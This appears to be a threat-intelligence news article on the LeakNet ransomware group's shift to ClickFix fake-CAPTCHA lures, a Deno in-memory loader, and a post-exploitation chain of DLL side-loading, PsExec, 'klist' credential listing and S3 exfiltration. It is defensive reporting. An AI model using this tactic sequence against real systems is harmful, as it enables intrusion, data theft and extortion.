Ransomware group LeakNet adopts ClickFix social engineering through compromised websites and deploys a novel Deno-based in-memory loader, marking a strategic shift away from third-party initial access brokers.
The ransomware operation known as LeakNet has adopted a new attack methodology that combines social engineering with sophisticated in-memory execution techniques, according to a technical report from ReliaQuest published March 17, 2026.
ClickFix Social Engineering Through Compromised Websites
LeakNet has integrated the ClickFix social engineering tactic as its primary initial access method, delivered through legitimate but compromised websites. This approach tricks users into manually executing malicious commands by presenting fake CAPTCHA verification checks that instruct victims to copy and paste an "msiexec.exe" command into the Windows Run dialog.
This marks a significant departure from LeakNet's previous reliance on stolen credentials obtained through initial access brokers (IABs). The shift offers several strategic advantages:
- Reduced dependency on third parties: Eliminates operational bottlenecks associated with waiting for valuable accounts to become available on the market
- Lower acquisition costs: Decreases per-victim acquisition expenses
- Broader targeting capability: Enables attacks across multiple industry verticals rather than being confined to specific sectors
The use of compromised legitimate websites to deliver ClickFix is particularly concerning because it doesn't present the same obvious network-level signals as attacker-owned infrastructure, making detection more challenging for defenders.
In-Memory Execution with Deno JavaScript Runtime
Once initial access is achieved, LeakNet employs a staged command-and-control (C2) loader built on the Deno JavaScript runtime. This loader executes malicious payloads directly in memory, minimizing on-disk evidence and evading traditional detection methods.
The Deno-based loader performs several critical functions:
- System fingerprinting: Identifies the compromised system's characteristics
- External payload retrieval: Contacts external servers to fetch next-stage malware
- Continuous execution loop: Enters a polling loop that repeatedly fetches and executes additional code through Deno
This approach represents a "bring your own runtime" (BYOR) strategy that allows the malware to operate with minimal footprint on the target system.
Consistent Post-Exploitation Methodology
Regardless of the initial access vector, LeakNet follows a repeatable post-exploitation sequence:
- DLL side-loading: Uses legitimate applications to load malicious DLLs
- Lateral movement: Employs PsExec for network propagation
- Credential harvesting: Executes "cmd.exe /c klist" to display active authentication credentials, allowing attackers to identify reachable accounts without requesting new credentials
- Data exfiltration: Utilizes Amazon S3 buckets to stage and exfiltrate data, exploiting the appearance of normal cloud traffic
- Encryption: Deploys ransomware to encrypt victim data
Microsoft Teams-Based Phishing Variant
ReliaQuest also observed an intrusion attempt using Microsoft Teams-based phishing to socially engineer users into launching a similar Deno-based payload chain. While this activity remains unattributed, it suggests either an expansion of LeakNet's initial access vectors or adoption of the technique by other threat actors.
Strategic Implications for Ransomware Operations
LeakNet's adoption of ClickFix represents both the first documented expansion of the group's initial access capability and a meaningful strategic shift. By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate.
The group, which emerged in November 2024 and describes itself as a "digital watchdog" focused on internet freedom and transparency, has also targeted industrial entities according to data from Dragos.
Broader Ransomware Landscape Context
Google's Threat Intelligence Group recently identified Qilin, Akira, Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce, and Sinobi as the top 10 ransomware brands with the most victims claimed on their data leak sites. The report noted that in a third of incidents, initial access involved exploitation of vulnerabilities, particularly in common VPNs and firewalls.
Despite ongoing disruption efforts, ransomware actors remain highly motivated, though indicators suggest declining profitability is pushing some groups to target smaller organizations with higher-volume attacks rather than large enterprises.
The combination of social engineering through compromised websites and in-memory execution techniques represents an evolution in ransomware tactics that emphasizes stealth, speed, and reduced reliance on external infrastructure or services.
Comments
Please log in or register to join the discussion